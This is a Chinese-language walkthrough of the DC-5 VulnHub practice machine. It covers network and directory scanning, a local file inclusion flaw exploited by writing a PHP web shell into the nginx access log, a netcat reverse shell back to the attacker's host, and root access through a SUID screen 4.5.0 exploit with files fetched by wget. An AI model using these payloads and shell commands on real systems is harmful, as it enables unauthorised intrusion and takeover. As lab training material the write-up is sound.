靶机难度：medium

靶机考点：远程文件包含漏洞

DC-5下载:https://download.vulnhub.com/dc/DC-5.zip.torrent

1. 信息收集

arp-scan -l //使用arp二层探测，获取靶机IP地址

nmap -A 靶机IP //扫描靶机开放的端口

目标靶机开放了 80（HTTP）、111（RPC）端口

1. 漏洞探测

我们访问网站看看，发现Concact选项页面的有提交数据的地方 （填写信息提交，看看有什么变化）

果然，在提交后页眉的时间变了 由2019 2018 同时也发现在刷新后不停地在变化

使用dirsearch 目录扫描工具扫一下网站的敏感文件和目录

dirsearch用法：-u 指定网站 -w指定字典 -r递归目录

dirsearch -u 192.168.174.136

发现两个未出现的文件：/footer.php 和 /thankyou.php

尝试访问footer.php 文件

每次刷新都会变化，再访问thankyou.php 文件发现是留言板

留言版的日期也是会变，发现thankyou.php包含了footer.php页面

有可能存在文件包含漏洞, 尝试使用 file= 参数进行传参看看

通过curl 了解到站点是由Nginx 1.6.2版本构建的 (也可使用Wappalyzer插件检测)

尝试访问Nginx的默认日志目录：/var/log/nginx/access.log

访问成功！

++++++++++++++++++++++++++++++++++++++++++

思路：利用对网站请求都会被记录到日志文件中这一原理，把代码（一句话木马）写入到网站日志中，再利用文件包含漏洞加载执行

++++++++++++++++++++++++++++++++++++++++++

1. 漏洞利用

同时使用Burpsuite pro和浏览器设置好代理，对请求的数据进行伪造、和一句话木马上传

Request模块 空白处右键选择 sed Repeater

点击Repeater

把一句话木马写在里面，利用cmd传参，调用系统命令，发送

*一句话木马：<?php system($_GET['cmd']); ?>

由于我们的请求是不合法的，所以服务器返回的HTTP请求状态码是400 (此时一句话木马已经被日志文件记录下来)

1. 拿到SHELL

使用nc监听在443端口：

命令：nc -lnvp 443

浏览器访问

http://192.168.58.162/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -nv 192.168.174.177 443 -e /bin/bash

这时，我们就拿到了一个SHELL

1. 权限提升

主机系统信息查看

1. 查看内核版本 uname -r
2. 查看版本信息 cat /etc/*-release

内核版本3.16.0-4-amd64 / 系统版本: Debian GNU/Linux 8

系统内核和版本均较新 尝试其他方法~

查找SUID位的文件

find / -perm -u=s 2>/dev/null

发现两个可疑的程序，screen-4.5.0 和 exim4

查找screen程序4.5版本的漏洞

不出所料，这个版本有本地提权漏洞

使用 -m 镜像到本地

本地提权补丁使用三板斧：

1. 把41154.sh文件37-42行代码拷贝出来，然后把41154.sh文件中37-42行代码删除
2. 执行./41154.sh脚本，把它在tmp目录下创建的两个文件移动到和41154.sh同一目录下
3. 把刚才单独拿出的代码写到一个.sh的文件中

现在把这三个文件传输到靶机

文件1：dc5.sh 文件2：libhax.so 文件3：rootshell

这里推荐使用python的方法来进行文件传输

在KALI 端 调用python模块来进行文件传输

命令： python -m http.server 8000

在靶机端 使用wget 进行下载

1. wget http://192.168.174.177:8000/dc5.sh

2. wget http://192.168.174.177:8000 /rootshell

3. wget http://192.168.174.177:8000/libhax.so

给这些脚本添加权限

chmod + dc5.sh

chmod + rootshell

chmod + libhax.so

然后 ，执行dc5.sh 至此提权完成！